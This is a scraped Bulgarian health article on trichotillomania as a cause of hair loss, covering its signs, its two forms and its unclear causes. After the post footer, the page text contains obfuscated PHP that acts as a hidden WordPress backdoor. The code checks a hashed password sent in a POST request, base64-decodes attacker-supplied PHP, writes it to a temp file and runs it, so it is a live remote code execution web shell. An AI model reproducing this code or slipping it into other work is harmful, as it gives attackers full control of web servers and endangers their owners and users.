Косопад и трихотиломания | Косопад

Трихотиломания като причина за косопад

Косопад вследствие на трихотиломания

Трихотиломанията е психическо заболяване, при което пациентът изпитна непреодолимо желание да скубе собствената си коса или вежди, често изтръгвайки цели кичури. Това състояние е един от основните причинители на косопад и представлява особен интерес за научните среди.

Косопад и трихотиломания

Косопад и трихотиломания

Трихотиломанията е класически случай на травматичен косопад. При някои пациенти, може да преминава леко и да се управлява. При други обаче автоагресията достига ужасяващи размери и след поредния пристъп, по скалпа могат да се наблюдават цели плешиви петна, които после се опитват да прикрият.

Признаци на косопад при трихотиломания

  • Многократно дърпане на косата, обичайно по скалпа, веждите и миглите, но и по други части на тялото
  • Силно и непреодолимо желание за скубане, последвано от чувство на облекчение след автоагресията
  • Неравномерни плешиви зони по скалпа и други части на тялото
  • Липсващи или разредени вежди и мигли
  • Ядене или дъвкане на оскубаната коса
  • Игра с изтръгнатите кичури
  • Триене на оскубаните косми в лицето или устните

Важно е да се отбележи, че повечето страдащи от косопад трихотиломани умело прикриват своето болестно състояние и замаскират олиселите петна по главата и тялото.

Според мнението на психолози, съществува два вида трихотиломания – целенасочена и несъзнателна. При първия вид пациентите си докарват косопад напълно съзнателно и през цялото време са наясно, че дърпат собствената си коса. При някои отделни случаи са наблюдавани и съпътстващи сложни ритуали, когато пациентът е във фаза.

При другия вид лицето несъзнателно играе с косата си, дърпа я и я опъва, без да си причинява сериозни болки. При тези пациенти почти никога не се наблюдава сериозен косопад.

До момента все още не е ясна причината за поява на трихотиломания. По всяка вероятност се дължи на сложни нарушения и комбинация от психични и генетични фактори. Появата на косопад обаче е само едно от последствията, понякога се стига до загуба на самочувствие и по – сериозни психологически проблеми.

26. май 2013 12:32:07 от Косопад
Категории: Косопад – Статии | Етикети: , , | 38 коментари

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}